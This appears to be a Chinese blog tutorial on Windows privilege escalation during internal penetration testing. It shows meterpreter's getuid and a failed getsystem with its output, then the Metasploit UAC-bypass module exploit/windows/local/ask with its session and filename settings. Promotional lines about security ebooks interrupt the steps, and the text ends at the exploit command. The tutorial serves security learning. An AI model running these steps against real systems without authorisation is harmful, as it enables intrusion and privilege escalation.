前言
本博文仅供学习使用,请勿他用!!!
网络安全成为当下最热门的话题,如何维护网络安全是关键,而内网渗透测试又是其中最重要的部分,接下来博主将会通过系列文章,对内网渗透进行介绍与复现;
继上篇博客获取到系统权限后,本文将会介绍如何提升获取到的系统权限,主要通过三种方式:提高程序运行级别,UAC 绕过,利用提权漏洞进行提权;
提高程序运行级别
1、查看当前的用户权限 getuid
,
meterpreter > getuid
Server username: WIN-50HM5UIKP60\sid10t
2、尝试提权 getsystem
,这种成功的概率极小,果然报错了:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
200多本网络安全系列电子书
网络安全标准题库资料
项目源码
网络安全基础入门、Linux、web安全、攻防方面的视频
网络安全学习路线图
3、把当前会话挂起 background
,然后启用模块 use exploit/windows/local/ask
,可以先通过 info
来查看一下这个模块的功能:
This module will attempt to elevate execution level using the ShellExecute undocumented RunAs flag to bypass low UAC settings. 此模块将尝试使用 ShellExecute undocumented RunAs 标志来提升执行级别,以绕过低 UAC 设置。
4、设置模块的一些属性:
FILENAME
:弹出 UAC 显示的文件名;PATH
:文件路径;SESSION
:选择会话的 ID;
设置完属性之后,就开始攻击 exploit
:
msf exploit(ask) > set session 2
session => 2
msf exploit(ask) > set filename sid10t.exe
filename => sid10t.exe
msf exploit(ask) > exploit